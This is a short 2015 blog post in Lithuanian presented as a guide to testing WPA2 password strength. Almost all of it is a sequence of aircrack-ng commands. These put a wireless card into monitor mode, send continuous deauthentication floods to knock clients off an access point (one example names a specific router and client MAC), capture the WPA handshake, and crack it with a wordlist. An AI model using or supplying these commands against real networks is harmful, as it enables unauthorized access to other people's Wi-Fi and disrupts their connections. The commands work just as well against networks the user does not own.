2015 m. balandžio 12 d., sekmadienis

WPA2 slaptažodžio atsparumo tikrinimas

Informacines komandos.
# airmon-ng && echo --- && iwconfig

Galima pasižiūrėti wifi interfeisą.
# iwconfig

Sukuriam stebėjimo režimą. "iwconfig" dabar rodys "mon0".
# airmon-ng start (wlan0)

Vienkartinis wifi skanavimas
# iwlist (wireless_interfeisas) scanning

Visų wifi tinklu stebėjimas.
# airodump-ng mon0

Deautentifikavimas:
Nesibaigiantis deauth siuntimas:
# aireplay-ng --deauth 0 -a (BSSID) --ignore-negative-one mon0
# aireplay-ng -0 0 -a (BSSID)  --ignore-negative-one  mon0 #arba

Deauth 5 paketų siuntimas:#sudo aireplay-ng -0 5 -a DC:FB:02:F1:2B:61 -c 7c:dd:90:50:65:3a --ignore-negative-one  mon0

Efektivesnis deauth nurodant kliento mac:# aireplay-ng --deauth 0 -a (BSSID)  -c (kliento_mac) --ignore-negative-one  mon0

Handshake gaudymas:
# airodump-ng mon0 -w (pavadinimas) -c 1 

–showack rodo išsamia informaciją apie  ACK
# airodump-ng -w (pavadinimas) --bssid (BSID arba routerio MAC) -c 1 --showack mon0

Ieškom slaptažodžio žodynų sąraše.
# aircrack-ng Pavadinimas-01.cap  -w (Žodyno_sąrašas)

logų stebėjimas
# tail -f -n 0 /var/log/syslog

Susiję: Žodžių sąrašai

Nuorodos:
Nuoroda - Įvairūs wireless hackinimo įrankiai.
Tut